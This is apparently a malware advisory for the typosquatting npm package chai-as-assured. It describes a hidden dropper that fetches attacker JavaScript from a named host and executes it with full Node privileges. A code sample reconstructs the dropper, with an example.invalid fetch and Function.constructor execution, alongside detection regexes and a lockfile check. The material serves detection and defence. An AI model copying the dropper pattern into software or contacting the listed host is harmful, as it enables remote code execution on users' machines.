
MAL-2026-6532

Malicious code in chai-as-assured (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (bd28efd7a3d07f87ec22556cc25a8c07117fa4cdd237c6cb1db750c976a11836)

chai-as-assured impersonates the popular chai-as-promised package (matching README, author, and API surface). When the exported plugin function is invoked under normal usage, an async IIFE in the plugin body base64-decodes a hardcoded URL (https://amethyst-lorrin-26.tiiny.site/index.json), performs an axios.get against that anonymous third-party host with a disguised header, and executes the response's `cookie` field as JavaScript via `new Function.constructor('require', response)(require)`. The fetched payload runs with full Node module privileges (filesystem, network, child_process, etc.) because `require` is passed in.

The C2 URL, header name (`x-secret-key`), and header value are concealed as base64 strings inside a fake local `process.env` object (DEV_API_KEY / DEV_SECRET_KEY / DEV_SECRET_VALUE) that shadows Node's global to evade casual source review.

The combination of name-confusion against a top-100 chai ecosystem package, deliberate obfuscation of attacker infrastructure, an unpinned anonymous tiiny.site host, and dynamic execution of the fetched response with `require` is an unambiguous remote-code-execution dropper targeting any project that installs and loads this plugin.
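The following is an added example, not code from the advisory, from Amazon Inspector, or from the package itself. It implements heuristic static checks for the indicators the source describes (a local `process` binding shadowing Node's global, base64 literals that decode to a URL or header name, an outbound HTTP call from library code, and `Function.constructor('require', ...)` executing fetched text), runs them over a constructed stand-in for the plugin body, and looks up the package name in a constructed package-lock.json. The stand-in uses `example.invalid` rather than the advisory's real host, performs no network call, and every function name, indicator name and sample value below is an assumption of this example.

```javascript
// Added example (not the advisory's or the package's own code): heuristic
// static checks for the dropper pattern described above, plus a lockfile
// lookup. All samples are constructed; the URL is example.invalid, not
// the advisory's real C2 host, and nothing here touches the network.
const b64 = (s) => Buffer.from(s, "utf8").toString("base64");

// Constructed stand-in for the malicious plugin body: a local `process`
// object shadows Node's global, the C2 URL and header are base64 strings,
// and the response body is executed with `require` in scope.
const MALICIOUS_SAMPLE = `
const process = { env: {
  DEV_API_KEY: "${b64("https://example.invalid/index.json")}",
  DEV_SECRET_KEY: "${b64("x-secret-key")}",
  DEV_SECRET_VALUE: "${b64("constructed-header-value")}",
} };
module.exports = function chaiAsAssured(chai, utils) {
  (async () => {
    const url = Buffer.from(process.env.DEV_API_KEY, "base64").toString("utf8");
    const hdr = Buffer.from(process.env.DEV_SECRET_KEY, "base64").toString("utf8");
    const val = Buffer.from(process.env.DEV_SECRET_VALUE, "base64").toString("utf8");
    const res = await axios.get(url, { headers: { [hdr]: val } });
    new Function.constructor("require", res.data.cookie)(require);
  })();
};`;

// Constructed benign chai plugin for comparison.
const BENIGN_SAMPLE = `
module.exports = function (chai, utils) {
  chai.Assertion.addProperty("eventually", function () {
    utils.flag(this, "eventually", true);
  });
};`;

// Each indicator is a regex over raw source; the names are this example's.
const INDICATORS = {
  // Function constructor called with a "require" parameter: whatever text
  // is passed as the body runs with module-level privileges.
  dynamic_exec_with_require:
    /(?:new\s+)?Function(?:\.constructor)?\s*\(\s*["'`]require["'`]/,
  // A local binding named `process` hides the real process.env.
  shadowed_process: /\b(?:const|let|var)\s+process\s*=/,
  // Outbound HTTP from what should be a pure assertion library.
  remote_fetch: /\baxios\s*\.\s*(?:get|post)\s*\(|\bfetch\s*\(|\bhttps?\s*\.\s*(?:get|request)\s*\(/,
  // Runtime base64 decoding of string constants.
  base64_decode: /Buffer\.from\s*\([^)]*["']base64["']\s*\)|\batob\s*\(/,
};

// Decode quoted base64-looking literals and keep those that decode to
// printable text; a URL among them is the strongest single signal.
function decodeLiterals(src) {
  const out = [];
  const re = /["'`]([A-Za-z0-9+\/]{12,}={0,2})["'`]/g;
  for (const m of src.matchAll(re)) {
    const decoded = Buffer.from(m[1], "base64").toString("utf8");
    if (/^[\x20-\x7e]+$/.test(decoded)) {
      out.push({ raw: m[1], decoded, isUrl: /^https?:\/\//.test(decoded) });
    }
  }
  return out;
}

// Verdict: fetch + dynamic exec with `require` is a dropper regardless of
// anything else; two or more weaker indicators are worth a manual look.
function assessPlugin(src) {
  const findings = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(src));
  const literals = decodeLiterals(src);
  if (literals.some((l) => l.isUrl)) findings.push("hidden_url");
  const verdict =
    findings.includes("dynamic_exec_with_require") && findings.includes("remote_fetch")
      ? "dropper"
      : findings.length >= 2 ? "suspicious" : "clean";
  return { verdict, findings, literals };
}

// package-lock v2/v3 keys every installed copy under `packages` by its
// on-disk path, so transitive (nested) installs are found as well.
function findInLockfile(lock, name) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === `node_modules/${name}` || path.endsWith(`/node_modules/${name}`)) {
      hits.push({ path, version: meta.version });
    }
  }
  return hits;
}

// Constructed lockfile fragment; the versions are placeholders.
const LOCKFILE_SAMPLE = {
  lockfileVersion: 3,
  packages: {
    "node_modules/chai": { version: "4.0.0" },
    "node_modules/chai-as-assured": { version: "0.0.0" },
    "node_modules/some-test-helper": { version: "1.0.0" },
    "node_modules/some-test-helper/node_modules/chai-as-assured": { version: "0.0.0" },
  },
};

console.log(assessPlugin(MALICIOUS_SAMPLE));
console.log(assessPlugin(BENIGN_SAMPLE).verdict);
console.log(findInLockfile(LOCKFILE_SAMPLE, "chai-as-assured"));
```

The regex indicators are deliberately coarse: `Function.constructor` and `new Function` are written in several equivalent ways, and a long quoted word can occasionally decode to printable bytes by chance, so treat `suspicious` as a prompt to read the file, not as a verdict. The lockfile walk is what the page's "are you affected" check amounts to in practice: the path-suffix match catches the package whether a project depends on it directly or pulls it in through another dependency.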


Affected packages

npm / chai-as-assured

No fixed version exists for chai-as-assured (npm): the package itself is the malicious artifact rather than a legitimate project with a bad release, so there is no known-safe version to pin to. Remove it from package.json and the lockfile, reinstall from a clean state, and depend on the genuine chai-as-promised package it impersonates. Any host that loaded the plugin should be treated as having run attacker-supplied code with full Node privileges.

References